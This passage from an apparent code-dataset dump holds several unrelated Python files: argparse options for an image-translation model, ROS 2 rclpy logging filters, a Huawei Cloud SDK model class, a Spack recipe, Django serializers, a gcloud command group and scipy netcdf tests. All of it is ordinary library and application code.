if "|" in key:
pos_pipe = key.index("|")
new_key = (key[:pos_pipe], int(key[pos_pipe + 1:]))
else:
new_key = (key, 0)
new_label_map[new_key] = val
label_map = new_label_map
return label_map
|
py | 1a304f7ea1d05edd53437f4b33cf05368d9e2c67 | import argparse
import os
from util import util
import torch
import models
import data
class BaseOptions():
"""This class defines options used during both training and test time.
It also implements several helper functions such as parsing, printing, and saving the options.
It also gathers additional options defined in <modify_commandline_options> functions in both dataset class and model class.
"""
def __init__(self):
"""Reset the class; indicates the class hasn't been initailized"""
self.initialized = False
def initialize(self, parser):
"""Define the common options that are used in both training and test."""
# basic parameters
parser.add_argument('--dataroot', required=True, help='path to images (should have subfolders trainA, trainB, valA, valB, etc)')
parser.add_argument('--name', type=str, default='experiment_name', help='name of the experiment. It decides where to store samples and models')
parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
parser.add_argument('--checkpoints_dir', type=str, default='./checkpoints', help='models are saved here')
# model parameters
parser.add_argument('--model', type=str, default='cycle_gan', help='chooses which model to use. [cycle_gan | pix2pix | test | colorization]')
parser.add_argument('--input_nc', type=int, default=3, help='# of input image channels: 3 for RGB and 1 for grayscale')
parser.add_argument('--output_nc', type=int, default=3, help='# of output image channels: 3 for RGB and 1 for grayscale')
parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in the last conv layer')
parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in the first conv layer')
parser.add_argument('--netD', type=str, default='basic', help='specify discriminator architecture [basic | n_layers | pixel]. The basic model is a 70x70 PatchGAN. n_layers allows you to specify the layers in the discriminator')
parser.add_argument('--netG', type=str, default='resnet_9blocks', help='specify generator architecture [resnet_9blocks | resnet_6blocks | unet_256 | unet_128]')
parser.add_argument('--n_layers_D', type=int, default=3, help='only used if netD==n_layers')
parser.add_argument('--norm', type=str, default='instance', help='instance normalization or batch normalization [instance | batch | none]')
parser.add_argument('--init_type', type=str, default='normal', help='network initialization [normal | xavier | kaiming | orthogonal]')
parser.add_argument('--init_gain', type=float, default=0.02, help='scaling factor for normal, xavier and orthogonal.')
parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator')
parser.add_argument('--conv_type', type=str, default='conv2d', help='conv type [conv2d | dcn_v1 | dcn_v2 | mixed]')
# dataset parameters
parser.add_argument('--dataset_mode', type=str, default='unaligned', help='chooses how datasets are loaded. [unaligned | aligned | single | colorization]')
parser.add_argument('--direction', type=str, default='AtoB', help='AtoB or BtoA')
parser.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly')
parser.add_argument('--num_threads', default=4, type=int, help='# threads for loading data')
parser.add_argument('--batch_size', type=int, default=1, help='input batch size')
parser.add_argument('--load_size', type=int, default=286, help='scale images to this size')
parser.add_argument('--crop_size', type=int, default=256, help='then crop to this size')
parser.add_argument('--max_dataset_size', type=int, default=float("inf"), help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.')
parser.add_argument('--preprocess', type=str, default='resize_and_crop', help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]')
parser.add_argument('--no_flip', action='store_true', help='if specified, do not flip the images for data augmentation')
parser.add_argument('--display_winsize', type=int, default=256, help='display window size for both visdom and HTML')
# additional parameters
parser.add_argument('--epoch', type=str, default='latest', help='which epoch to load? set to latest to use latest cached model')
parser.add_argument('--load_iter', type=int, default='0', help='which iteration to load? if load_iter > 0, the code will load models by iter_[load_iter]; otherwise, the code will load models by [epoch]')
parser.add_argument('--verbose', action='store_true', help='if specified, print more debugging information')
parser.add_argument('--suffix', default='', type=str, help='customized suffix: opt.name = opt.name + suffix: e.g., {model}_{netG}_size{load_size}')
self.initialized = True
return parser
def gather_options(self):
"""Initialize our parser with basic options(only once).
Add additional model-specific and dataset-specific options.
These options are defined in the <modify_commandline_options> function
in model and dataset classes.
"""
if not self.initialized: # check if it has been initialized
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser = self.initialize(parser)
# get the basic options
opt, _ = parser.parse_known_args()
# modify model-related parser options
model_name = opt.model
model_option_setter = models.get_option_setter(model_name)
parser = model_option_setter(parser, self.isTrain)
opt, _ = parser.parse_known_args() # parse again with new defaults
# modify dataset-related parser options
dataset_name = opt.dataset_mode
dataset_option_setter = data.get_option_setter(dataset_name)
parser = dataset_option_setter(parser, self.isTrain)
# save and return the parser
self.parser = parser
return parser.parse_args()
def print_options(self, opt):
"""Print and save options
It will print both current options and default values(if different).
It will save options into a text file / [checkpoints_dir] / opt.txt
"""
message = ''
message += '----------------- Options ---------------\n'
for k, v in sorted(vars(opt).items()):
comment = ''
default = self.parser.get_default(k)
if v != default:
comment = '\t[default: %s]' % str(default)
message += '{:>25}: {:<30}{}\n'.format(str(k), str(v), comment)
message += '----------------- End -------------------'
print(message)
# save to the disk
expr_dir = os.path.join(opt.checkpoints_dir, opt.name)
util.mkdirs(expr_dir)
file_name = os.path.join(expr_dir, '{}_opt.txt'.format(opt.phase))
with open(file_name, 'wt') as opt_file:
opt_file.write(message)
opt_file.write('\n')
def parse(self):
"""Parse our options, create checkpoints directory suffix, and set up gpu device."""
opt = self.gather_options()
opt.isTrain = self.isTrain # train or test
# process opt.suffix
if opt.suffix:
suffix = ('_' + opt.suffix.format(**vars(opt))) if opt.suffix != '' else ''
opt.name = opt.name + suffix
self.print_options(opt)
# set gpu ids
str_ids = opt.gpu_ids.split(',')
opt.gpu_ids = []
for str_id in str_ids:
id = int(str_id)
if id >= 0:
opt.gpu_ids.append(id)
if len(opt.gpu_ids) > 0:
torch.cuda.set_device(opt.gpu_ids[0])
self.opt = opt
return self.opt
|
py | 1a304fb8b4003bdc8146cbb2fd665e2bee8eff90 | # Copyright 2017 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
from collections import OrderedDict
import inspect
import os
from rclpy.clock import Clock
from rclpy.impl.implementation_singleton import rclpy_implementation as _rclpy
# Known filenames from which logging methods can be called (will be ignored in `_find_caller`).
_internal_callers = []
# This will cause rclpy filenames to be registered in `_internal_callers` on first logging call.
_populate_internal_callers = True
def _find_caller(frame):
"""Get the first calling frame that is outside of rclpy."""
global _populate_internal_callers
global _internal_callers
if _populate_internal_callers:
# Populate the list of internal filenames from which logging methods can be called.
# This has to be done from within a function to avoid cyclic module imports.
import rclpy.logging
# Extend the list to preserve any filenames that may have been added by third parties.
# Note: the call to `realpath` will also resolve mixed slashes that can result on Windows.
_internal_callers.extend([
os.path.realpath(__file__),
os.path.realpath(rclpy.logging.__file__),
])
_populate_internal_callers = False
file_path = os.path.realpath(inspect.getframeinfo(frame).filename)
while any(f in file_path for f in _internal_callers):
frame = frame.f_back
file_path = os.path.realpath(inspect.getframeinfo(frame).filename)
return frame
class CallerId(
namedtuple('CallerId', ['function_name', 'file_path', 'line_number', 'last_index'])):
def __new__(cls, frame=None):
if not frame:
frame = _find_caller(inspect.currentframe())
return super(CallerId, cls).__new__(
cls,
function_name=frame.f_code.co_name,
file_path=os.path.abspath(inspect.getframeinfo(frame).filename),
line_number=frame.f_lineno,
last_index=frame.f_lasti, # To distinguish between two callers on the same line
)
class LoggingFilter:
"""Base class for logging filters."""
"""
Parameters of a filter and their default value, if appropriate.
A default value of None makes a parameter required.
"""
params = {}
"""
Initialize the context of a logging call, e.g. declare variables needed for
determining the log condition and add them to the context.
"""
@classmethod
def initialize_context(cls, context, **kwargs):
# Store all parameters in the context so we can check that users never try to change them.
for param in cls.params:
context[param] = kwargs.get(param, cls.params[param])
if context[param] is None:
raise TypeError(
'Required parameter "{0}" was not specified for logging filter "{1}"'
.format(param, cls.__name__))
"""
Decide if it's appropriate to log given a context, and update the context accordingly.
"""
@staticmethod
def should_log(context):
return True
class Once(LoggingFilter):
"""Ignore all log calls except the first one."""
params = {
'once': None,
}
@classmethod
def initialize_context(cls, context, **kwargs):
super(Once, cls).initialize_context(context, **kwargs)
context['has_been_logged_once'] = False
@staticmethod
def should_log(context):
logging_condition = False
if not context['has_been_logged_once']:
logging_condition = True
context['has_been_logged_once'] = True
return logging_condition
class Throttle(LoggingFilter):
"""Ignore log calls if the last call is not longer ago than the specified duration."""
params = {
'throttle_duration_sec': None,
'throttle_time_source_type': Clock(),
}
@classmethod
def initialize_context(cls, context, **kwargs):
super(Throttle, cls).initialize_context(context, **kwargs)
context['throttle_last_logged'] = 0
if not isinstance(context['throttle_time_source_type'], Clock):
raise ValueError(
'Received throttle_time_source_type of "{0}" '
'is not a clock instance'
.format(context['throttle_time_source_type']))
@staticmethod
def should_log(context):
logging_condition = True
now = context['throttle_time_source_type'].now().nanoseconds
next_log_time = context['throttle_last_logged'] + (context['throttle_duration_sec'] * 1e+9)
logging_condition = now >= next_log_time
if logging_condition:
context['throttle_last_logged'] = now
return logging_condition
class SkipFirst(LoggingFilter):
"""Ignore the first log call but process all subsequent calls."""
params = {
'skip_first': None,
}
@classmethod
def initialize_context(cls, context, **kwargs):
super(SkipFirst, cls).initialize_context(context, **kwargs)
context['first_has_been_skipped'] = False
@staticmethod
def should_log(context):
logging_condition = True
if not context['first_has_been_skipped']:
logging_condition = False
context['first_has_been_skipped'] = True
return logging_condition
# The ordering of this dictionary defines the order in which filters will be processed.
supported_filters = OrderedDict()
supported_filters['throttle'] = Throttle
supported_filters['skip_first'] = SkipFirst
supported_filters['once'] = Once
def get_filters_from_kwargs(**kwargs):
"""
Determine which filters have had parameters specified in the given keyword arguments.
Returns the list of filters using the order specified by `supported_filters`.
"""
detected_filters = []
all_supported_params = []
for supported_filter, filter_class in supported_filters.items():
filter_params = filter_class.params.keys()
all_supported_params.extend(filter_params)
if any(kwargs.get(param_name) for param_name in filter_params):
detected_filters.append(supported_filter)
# Check that all required parameters (with no default value) have been specified
for detected_filter in detected_filters:
for param_name, default_value in supported_filters[detected_filter].params.items():
if param_name in kwargs:
continue
# Param not specified; use the default.
if default_value is None:
raise TypeError(
'required parameter "{0}" not specified '
'but is required for the the logging filter "{1}"'.format(
param_name, detected_filter))
kwargs[param_name] = default_value
for kwarg in kwargs:
if kwarg not in all_supported_params:
raise TypeError(
'parameter "{0}" is not one of the recognized logging options "{1}"'
.format(kwarg, all_supported_params)
)
return detected_filters
class RcutilsLogger:
def __init__(self, name=''):
self.name = name
self.contexts = {}
def get_child(self, name):
if not name:
raise ValueError('Child logger name must not be empty.')
if self.name:
# Prepend the name of this logger
name = self.name + '.' + name
return RcutilsLogger(name=name)
def set_level(self, level):
from rclpy.logging import LoggingSeverity
level = LoggingSeverity(level)
return _rclpy.rclpy_logging_set_logger_level(self.name, level)
def get_effective_level(self):
from rclpy.logging import LoggingSeverity
level = LoggingSeverity(
_rclpy.rclpy_logging_get_logger_effective_level(self.name))
return level
def is_enabled_for(self, severity):
from rclpy.logging import LoggingSeverity
severity = LoggingSeverity(severity)
return _rclpy.rclpy_logging_logger_is_enabled_for(self.name, severity)
def log(self, message, severity, **kwargs):
r"""
Log a message with the specified severity.
The message will not be logged if:
* the logger is not enabled for the message's severity (the message severity is less than
the level of the logger), or
* a logging filter causes the message to be skipped.
.. note::
Logging filters will only be evaluated if the logger is enabled for the message's
severity.
:param message str: message to log.
:param severity: severity of the message.
:type severity: :py:class:LoggingSeverity
:keyword name str: name of the logger to use.
:param \**kwargs: optional parameters for logging filters (see below).
:Keyword Arguments:
* *throttle_duration_sec* (``float``) --
Duration of the throttle interval for the :py:class:Throttle: filter.
* *throttle_time_source_type* (``str``) --
Optional time source type for the :py:class:Throttle: filter (default of
``RCUTILS_STEADY_TIME``)
* *skip_first* (``bool``) --
If True, enable the :py:class:SkipFirst: filter.
* *once* (``bool``) --
If True, enable the :py:class:Once: filter.
:returns: False if a filter caused the message to not be logged; True otherwise.
:raises: TypeError on invalid filter parameter combinations.
:raises: ValueError on invalid parameters values.
:rtype: bool
"""
# Gather context info and check filters only if the severity is appropriate.
if not self.is_enabled_for(severity):
return False
from rclpy.logging import LoggingSeverity
severity = LoggingSeverity(severity)
name = kwargs.pop('name', self.name)
# Infer the requested log filters from the keyword arguments
detected_filters = get_filters_from_kwargs(**kwargs)
# Get/prepare the context corresponding to the caller.
caller_id = CallerId()
if caller_id not in self.contexts:
context = {'name': name, 'severity': severity}
for detected_filter in detected_filters:
if detected_filter in supported_filters:
supported_filters[detected_filter].initialize_context(context, **kwargs)
context['filters'] = detected_filters
self.contexts[caller_id] = context
else:
context = self.contexts[caller_id]
# Don't support any changes to the logger.
if severity != context['severity']:
raise ValueError('Logger severity cannot be changed between calls.')
if name != context['name']:
raise ValueError('Logger name cannot be changed between calls.')
if detected_filters != context['filters']:
raise ValueError('Requested logging filters cannot be changed between calls.')
for detected_filter in detected_filters:
filter_params = supported_filters[detected_filter].params
if any(context[p] != kwargs.get(p, filter_params[p]) for p in filter_params):
raise ValueError(
'Logging filter parameters cannot be changed between calls.')
# Check if any filter determines the message shouldn't be processed.
# Note(dhood): even if a message doesn't get logged, a filter might still update its state
# as if it had been. This matches the behavior of the C logging macros provided by rcutils.
for logging_filter in context['filters']:
if not supported_filters[logging_filter].should_log(context):
return False
# Call the relevant function from the C extension.
_rclpy.rclpy_logging_rcutils_log(
severity, name, message,
caller_id.function_name, caller_id.file_path, caller_id.line_number)
return True
def debug(self, message, **kwargs):
"""Log a message with `DEBUG` severity via :py:classmethod:RcutilsLogger.log:."""
from rclpy.logging import LoggingSeverity
return self.log(message, LoggingSeverity.DEBUG, **kwargs)
def info(self, message, **kwargs):
"""Log a message with `INFO` severity via :py:classmethod:RcutilsLogger.log:."""
from rclpy.logging import LoggingSeverity
return self.log(message, LoggingSeverity.INFO, **kwargs)
def warning(self, message, **kwargs):
"""Log a message with `WARN` severity via :py:classmethod:RcutilsLogger.log:."""
from rclpy.logging import LoggingSeverity
return self.log(message, LoggingSeverity.WARN, **kwargs)
def warn(self, message, **kwargs):
"""
Log a message with `WARN` severity via :py:classmethod:RcutilsLogger.log:.
Deprecated in favor of :py:classmethod:RcutilsLogger.warning:.
"""
return self.warning(message, **kwargs)
def error(self, message, **kwargs):
"""Log a message with `ERROR` severity via :py:classmethod:RcutilsLogger.log:."""
from rclpy.logging import LoggingSeverity
return self.log(message, LoggingSeverity.ERROR, **kwargs)
def fatal(self, message, **kwargs):
"""Log a message with `FATAL` severity via :py:classmethod:RcutilsLogger.log:."""
from rclpy.logging import LoggingSeverity
return self.log(message, LoggingSeverity.FATAL, **kwargs)
|
py | 1a30507e3719dd13640618cadf10306d4426c321 | def escreva(txt):
vzs = int(len(txt)) + 2
print('~' * vzs)
print(f' {txt} ')
print('~' * vzs)
escreva('Ian Stigliano')
escreva('Aprenda Python')
escreva('Curso em Python do Guanabara')
escreva('Ian') |
py | 1a30509d30a1bf83e042370ff613f420542870b5 | # coding: utf-8
import pprint
import re
import six
class ImageDetectionResultDetailPolitics:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'confidence': 'float',
'label': 'str',
'face_detail': 'ImageDetectionResultDetailFaceDetail'
}
attribute_map = {
'confidence': 'confidence',
'label': 'label',
'face_detail': 'face_detail'
}
def __init__(self, confidence=None, label=None, face_detail=None):
"""ImageDetectionResultDetailPolitics - a model defined in huaweicloud sdk"""
self._confidence = None
self._label = None
self._face_detail = None
self.discriminator = None
if confidence is not None:
self.confidence = confidence
if label is not None:
self.label = label
if face_detail is not None:
self.face_detail = face_detail
@property
def confidence(self):
"""Gets the confidence of this ImageDetectionResultDetailPolitics.
:return: The confidence of this ImageDetectionResultDetailPolitics.
:rtype: float
"""
return self._confidence
@confidence.setter
def confidence(self, confidence):
"""Sets the confidence of this ImageDetectionResultDetailPolitics.
:param confidence: The confidence of this ImageDetectionResultDetailPolitics.
:type: float
"""
self._confidence = confidence
@property
def label(self):
"""Gets the label of this ImageDetectionResultDetailPolitics.
:return: The label of this ImageDetectionResultDetailPolitics.
:rtype: str
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this ImageDetectionResultDetailPolitics.
:param label: The label of this ImageDetectionResultDetailPolitics.
:type: str
"""
self._label = label
@property
def face_detail(self):
"""Gets the face_detail of this ImageDetectionResultDetailPolitics.
:return: The face_detail of this ImageDetectionResultDetailPolitics.
:rtype: ImageDetectionResultDetailFaceDetail
"""
return self._face_detail
@face_detail.setter
def face_detail(self, face_detail):
"""Sets the face_detail of this ImageDetectionResultDetailPolitics.
:param face_detail: The face_detail of this ImageDetectionResultDetailPolitics.
:type: ImageDetectionResultDetailFaceDetail
"""
self._face_detail = face_detail
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ImageDetectionResultDetailPolitics):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
py | 1a305242a09f192c3cb9515271fa7ceb5357e232 | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RTfmpvalue(RPackage):
"""In putative Transcription Factor Binding Sites (TFBSs) identification
from sequence/alignments, we are interested in the significance of
certain match score. TFMPvalue provides the accurate calculation of
P-value with score threshold for Position Weight Matrices, or the score
with given P-value. This package is an interface to code originally
made available by Helene Touzet and Jean-Stephane Varre, 2007,
Algorithms Mol Biol:2, 15."""
homepage = "https://github.com/ge11232002/TFMPvalue"
url = "https://cran.rstudio.com/src/contrib/TFMPvalue_0.0.6.tar.gz"
list_url = "https://cran.rstudio.com/src/contrib/Archive/TFMPvalue"
version('0.0.6', '69fdf4f9b9a0f408a5cee9ce34bea261')
depends_on('[email protected]:', type=('build', 'run'))
|
py | 1a30537e7480b0064fca0d62c9bb729f31c21ef4 | https://forms.gle/3jisA75mp56U2F4L6
https://docs.google.com/spreadsheets/d/e/2PACX-1vTUSn1L4ChdUQeJSx2ufan1h9AhHzKEqPwBZwYmigstcfylLoxdn50Ndz_SF1cSwKFAD9Pw1rPEfo6t/pubhtml |
py | 1a3053a65b79a4453d2e85f91bf7be515d587ce4 | """ Contact serializers. """
# Django REST Framework
from ast import Num
from statistics import mode
from rest_framework import serializers
# Models
from coeadmin.record.models.person import Person
from coeadmin.record.models.contact import Contact
# Serializers
from coeadmin.record.serializers.person import PersonModelSerializer
# Utilities
from datetime import datetime, timedelta
class ContactModelSerializer(serializers.ModelSerializer):
""" Contact serializer. """
person = PersonModelSerializer(allow_null=True)
class Meta:
""" Meta class. """
model = Contact
fields = (
'id',
'person',
'contact_date',
'contact_type',
'insolation_days',
'high_insulation_date',
'is_active',
)
read_only_fields = (
'id',
'person'
)
class AddContactSerializer(serializers.ModelSerializer):
""" Add contact serializer. """
class Meta:
""" Meta class. """
model = Contact
fields = (
'id',
'person',
'contact_date',
'contact_type',
'insolation_days',
'high_insulation_date',
'is_active',
)
def create(self, validate_data):
""" Create the contact. """
positive = self.context['positive']
person = validate_data['person']
days = validate_data['insolation_days']
contact_date= validate_data['contact_date'],
contact = Contact.objects.create(
positive=positive,
person=person,
contact_date= validate_data['contact_date'],
contact_type= validate_data['contact_type'],
insolation_days=days,
high_insulation_date=contact_date[0] + timedelta(days=days),
)
return contact |
py | 1a3053bf5ebef03ef1571f606882f58543820372 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The command group for cloud dataproc operations."""
from googlecloudsdk.calliope import base
class Operations(base.Group):
"""View and manage Google Cloud Dataproc operations."""
detailed_help = {
'DESCRIPTION': '{description}',
'EXAMPLES': """\
To cancel an active operation, run:
$ {command} cancel operation_id
To view the details of an operation, run:
$ {command} describe operation_id
To see the list of all operations, run:
$ {command} list
To delete the record of an inactive operation, run:
$ {command} delete operation_id
""",
}
|
py | 1a3053e21bd3e36feaff15231bc4c71fec1fef21 | ''' Tests for netcdf '''
from __future__ import division, print_function, absolute_import
import os
from os.path import join as pjoin, dirname
import shutil
import tempfile
import warnings
from io import BytesIO
from glob import glob
from contextlib import contextmanager
import numpy as np
from numpy.testing import (assert_, assert_allclose, assert_raises,
assert_equal, run_module_suite)
from scipy.io.netcdf import netcdf_file
from scipy._lib._tmpdirs import in_tempdir
TEST_DATA_PATH = pjoin(dirname(__file__), 'data')
N_EG_ELS = 11 # number of elements for example variable
VARTYPE_EG = 'b' # var type for example variable
@contextmanager
def make_simple(*args, **kwargs):
f = netcdf_file(*args, **kwargs)
f.history = 'Created for a test'
f.createDimension('time', N_EG_ELS)
time = f.createVariable('time', VARTYPE_EG, ('time',))
time[:] = np.arange(N_EG_ELS)
time.units = 'days since 2008-01-01'
f.flush()
yield f
f.close()
def check_simple(ncfileobj):
'''Example fileobj tests '''
assert_equal(ncfileobj.history, b'Created for a test')
time = ncfileobj.variables['time']
assert_equal(time.units, b'days since 2008-01-01')
assert_equal(time.shape, (N_EG_ELS,))
assert_equal(time[-1], N_EG_ELS-1)
def assert_mask_matches(arr, expected_mask):
'''
Asserts that the mask of arr is effectively the same as expected_mask.
In contrast to numpy.ma.testutils.assert_mask_equal, this function allows
testing the 'mask' of a standard numpy array (the mask in this case is treated
as all False).
Parameters
----------
arr: ndarray or MaskedArray
Array to test.
expected_mask: array_like of booleans
A list giving the expected mask.
'''
mask = np.ma.getmaskarray(arr)
assert_equal(mask, expected_mask)
def test_read_write_files():
# test round trip for example file
cwd = os.getcwd()
try:
tmpdir = tempfile.mkdtemp()
os.chdir(tmpdir)
with make_simple('simple.nc', 'w') as f:
pass
# read the file we just created in 'a' mode
with netcdf_file('simple.nc', 'a') as f:
check_simple(f)
# add something
f._attributes['appendRan'] = 1
# To read the NetCDF file we just created::
with netcdf_file('simple.nc') as f:
# Using mmap is the default
assert_(f.use_mmap)
check_simple(f)
assert_equal(f._attributes['appendRan'], 1)
# Read it in append (and check mmap is off)
with netcdf_file('simple.nc', 'a') as f:
assert_(not f.use_mmap)
check_simple(f)
assert_equal(f._attributes['appendRan'], 1)
# Now without mmap
with netcdf_file('simple.nc', mmap=False) as f:
# Using mmap is the default
assert_(not f.use_mmap)
check_simple(f)
# To read the NetCDF file we just created, as file object, no
# mmap. When n * n_bytes(var_type) is not divisible by 4, this
# raised an error in pupynere 1.0.12 and scipy rev 5893, because
# calculated vsize was rounding up in units of 4 - see
# http://www.unidata.ucar.edu/software/netcdf/docs/netcdf.html
with open('simple.nc', 'rb') as fobj:
with netcdf_file(fobj) as f:
# by default, don't use mmap for file-like
assert_(not f.use_mmap)
check_simple(f)
# Read file from fileobj, with mmap
with open('simple.nc', 'rb') as fobj:
with netcdf_file(fobj, mmap=True) as f:
assert_(f.use_mmap)
check_simple(f)
# Again read it in append mode (adding another att)
with open('simple.nc', 'r+b') as fobj:
with netcdf_file(fobj, 'a') as f:
assert_(not f.use_mmap)
check_simple(f)
f.createDimension('app_dim', 1)
var = f.createVariable('app_var', 'i', ('app_dim',))
var[:] = 42
# And... check that app_var made it in...
with netcdf_file('simple.nc') as f:
check_simple(f)
assert_equal(f.variables['app_var'][:], 42)
except:
os.chdir(cwd)
shutil.rmtree(tmpdir)
raise
os.chdir(cwd)
shutil.rmtree(tmpdir)
def test_read_write_sio():
eg_sio1 = BytesIO()
with make_simple(eg_sio1, 'w') as f1:
str_val = eg_sio1.getvalue()
eg_sio2 = BytesIO(str_val)
with netcdf_file(eg_sio2) as f2:
check_simple(f2)
# Test that error is raised if attempting mmap for sio
eg_sio3 = BytesIO(str_val)
assert_raises(ValueError, netcdf_file, eg_sio3, 'r', True)
# Test 64-bit offset write / read
eg_sio_64 = BytesIO()
with make_simple(eg_sio_64, 'w', version=2) as f_64:
str_val = eg_sio_64.getvalue()
eg_sio_64 = BytesIO(str_val)
with netcdf_file(eg_sio_64) as f_64:
check_simple(f_64)
assert_equal(f_64.version_byte, 2)
# also when version 2 explicitly specified
eg_sio_64 = BytesIO(str_val)
with netcdf_file(eg_sio_64, version=2) as f_64:
check_simple(f_64)
assert_equal(f_64.version_byte, 2)
def test_read_example_data():
# read any example data files
for fname in glob(pjoin(TEST_DATA_PATH, '*.nc')):
with netcdf_file(fname, 'r') as f:
pass
with netcdf_file(fname, 'r', mmap=False) as f:
pass
def test_itemset_no_segfault_on_readonly():
# Regression test for ticket #1202.
# Open the test file in read-only mode.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
filename = pjoin(TEST_DATA_PATH, 'example_1.nc')
with netcdf_file(filename, 'r') as f:
time_var = f.variables['time']
# time_var.assignValue(42) should raise a RuntimeError--not seg. fault!
assert_raises(RuntimeError, time_var.assignValue, 42)
def test_write_invalid_dtype():
dtypes = ['int64', 'uint64']
if np.dtype('int').itemsize == 8: # 64-bit machines
dtypes.append('int')
if np.dtype('uint').itemsize == 8: # 64-bit machines
dtypes.append('uint')
with netcdf_file(BytesIO(), 'w') as f:
f.createDimension('time', N_EG_ELS)
for dt in dtypes:
assert_raises(ValueError, f.createVariable, 'time', dt, ('time',))
def test_flush_rewind():
stream = BytesIO()
with make_simple(stream, mode='w') as f:
x = f.createDimension('x',4)
v = f.createVariable('v', 'i2', ['x'])
v[:] = 1
f.flush()
len_single = len(stream.getvalue())
f.flush()
len_double = len(stream.getvalue())
assert_(len_single == len_double)
def test_dtype_specifiers():
# Numpy 1.7.0-dev had a bug where 'i2' wouldn't work.
# Specifying np.int16 or similar only works from the same commit as this
# comment was made.
with make_simple(BytesIO(), mode='w') as f:
f.createDimension('x',4)
f.createVariable('v1', 'i2', ['x'])
f.createVariable('v2', np.int16, ['x'])
f.createVariable('v3', np.dtype(np.int16), ['x'])
def test_ticket_1720():
io = BytesIO()
items = [0,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]
with netcdf_file(io, 'w') as f:
f.history = 'Created for a test'
f.createDimension('float_var', 10)
float_var = f.createVariable('float_var', 'f', ('float_var',))
float_var[:] = items
float_var.units = 'metres'
f.flush()
contents = io.getvalue()
io = BytesIO(contents)
with netcdf_file(io, 'r') as f:
assert_equal(f.history, b'Created for a test')
float_var = f.variables['float_var']
assert_equal(float_var.units, b'metres')
assert_equal(float_var.shape, (10,))
assert_allclose(float_var[:], items)
def test_mmaps_segfault():
filename = pjoin(TEST_DATA_PATH, 'example_1.nc')
with warnings.catch_warnings():
warnings.simplefilter("error")
with netcdf_file(filename, mmap=True) as f:
x = f.variables['lat'][:]
# should not raise warnings
del x
def doit():
with netcdf_file(filename, mmap=True) as f:
return f.variables['lat'][:]
# should not crash
with warnings.catch_warnings():
warnings.simplefilter("ignore")
x = doit()
x.sum()
def test_zero_dimensional_var():
io = BytesIO()
with make_simple(io, 'w') as f:
v = f.createVariable('zerodim', 'i2', [])
# This is checking that .isrec returns a boolean - don't simplify it
# to 'assert not ...'
assert v.isrec is False, v.isrec
f.flush()
def test_byte_gatts():
# Check that global "string" atts work like they did before py3k
# unicode and general bytes confusion
with in_tempdir():
filename = 'g_byte_atts.nc'
f = netcdf_file(filename, 'w')
f._attributes['holy'] = b'grail'
f._attributes['witch'] = 'floats'
f.close()
f = netcdf_file(filename, 'r')
assert_equal(f._attributes['holy'], b'grail')
assert_equal(f._attributes['witch'], b'floats')
f.close()
def test_open_append():
# open 'w' put one attr
with in_tempdir():
filename = 'append_dat.nc'
f = netcdf_file(filename, 'w')
f._attributes['Kilroy'] = 'was here'
f.close()
# open again in 'a', read the att and and a new one
f = netcdf_file(filename, 'a')
assert_equal(f._attributes['Kilroy'], b'was here')
f._attributes['naughty'] = b'Zoot'
f.close()
# open yet again in 'r' and check both atts
f = netcdf_file(filename, 'r')
assert_equal(f._attributes['Kilroy'], b'was here')
assert_equal(f._attributes['naughty'], b'Zoot')
f.close()
def test_append_recordDimension():
dataSize = 100
with in_tempdir():
# Create file with record time dimension
with netcdf_file('withRecordDimension.nc', 'w') as f:
f.createDimension('time', None)
f.createVariable('time', 'd', ('time',))
f.createDimension('x', dataSize)
x = f.createVariable('x', 'd', ('x',))
x[:] = np.array(range(dataSize))
f.createDimension('y', dataSize)
y = f.createVariable('y', 'd', ('y',))
y[:] = np.array(range(dataSize))
f.createVariable('testData', 'i', ('time', 'x', 'y'))
f.flush()
f.close()
for i in range(2):
# Open the file in append mode and add data
with netcdf_file('withRecordDimension.nc', 'a') as f:
f.variables['time'].data = np.append(f.variables["time"].data, i)
